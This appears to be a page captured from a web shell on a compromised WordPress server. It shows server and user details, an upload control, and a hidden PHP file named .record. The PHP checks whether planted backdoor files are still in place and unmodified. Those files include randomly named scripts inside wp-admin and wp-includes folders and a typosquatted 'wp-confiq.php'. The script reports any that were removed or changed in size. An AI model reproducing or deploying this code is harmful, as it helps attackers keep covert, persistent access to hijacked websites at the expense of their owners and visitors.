HEX
Server: Apache/2.4.65 (Unix) OpenSSL/3.5.1
System: Linux bavaria.hybridsync.com 5.14.0-611.41.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 19 03:50:11 EDT 2026 x86_64
User: hdradio (1005)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/hdradio/tmp/.record
<?php   $r = '/home/hdradio/live.hdradiostreaming.com'; $x = ["/header.php"=>"bd@@7114494@@23",
"/content.php"=>"bd@@7114747@@42",
"/wp-content/themes/twentytwenty/tzqKaWl.php"=>"bd@@7115362@@3",
"/wp-admin/css/colors/HVovxzYPai.php"=>"bd@@7126103@@62",
"/wp-includes/images/XagWIBbTMG.php"=>"bd@@7126184@@71",
"/wp-admin/css/colors/midnight/YQRMuOqAA.php"=>"bd@@7126296@@88",
"/wp-includes/revisions.php"=>"bd@@7126417@@9",
"/wp-confiq.php"=>"bd@@7126520@@83",
"/wp-content/themes/ptdQt.php"=>"bd@@7115070@@38"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');